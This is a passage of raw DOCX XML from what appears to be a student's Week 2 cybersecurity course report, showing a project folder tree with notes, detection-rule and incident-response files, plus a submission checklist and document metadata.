        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   └── Week2_Complete_Report.docx     ← This document</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ├── notes/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   ├── threat_analysis_notes.md       ← STRIDE, MITRE ATT&amp;CK, APTs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   ├── frameworks_notes.md            ← NIST CSF, ISO 27001, CIS Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   ├── incident_response_notes.md     ← IR lifecycle, SOC model, priorities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   └── risk_management_notes.md       ← ALE, BIA, FAIR model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ├── workflow/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   ├── sigma_rule_powershell.yml      ← Task 1: Sigma rule for PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   ├── suricata_rule.rules            ← Task 5: Suricata blocking rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   ├── ale_calculation.md             ← Task 6: ALE formula + risk matrix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   ├── incident_response_report.md    ← Task 7: SANS IR report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    │   └── capstone_report.md             ← Task 8: Capstone write-up</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    └── screenshots/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ├── README.md                      ← Screenshot naming guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ├── 01_elastic_security_logs.png   ← ADD YOUR SCREENSHOTS HERE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ├── 02_sigma_rule_test.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        ├── 03_remnux_strings_output.png</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        └── ... (see screenshots/README.md)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Submission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4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File Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Main Report (DOCX)</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Week2/docs/Week2_Complete_Report.docx</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Included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Theory Notes (4 files)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Week2/notes/*.md</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Included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Sigma Rule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Week2/workflow/sigma_rule_powershell.yml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Included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Suricata Rules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Week2/workflow/suricata_rule.rules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Included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ALE Calculation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Week2/workflow/ale_calculation.md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Included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IR Report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Week2/workflow/incident_response_report.md</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Included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Capstone Report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Week2/workflow/capstone_report.md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Included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Screenshots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Week2/screenshots/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Add your own screenshots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README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Week2/README.md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Included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GitHub Repo Link</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DM to instructor by Friday 4:30 PM</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Action required</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jc w:val="right"/>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pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="595959"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">CYART Red Teaming — Week 2: Advanced Threat Analysis &amp; Incident Response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2026-03-26T08:51:44.577Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-26T08:51:44.578Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>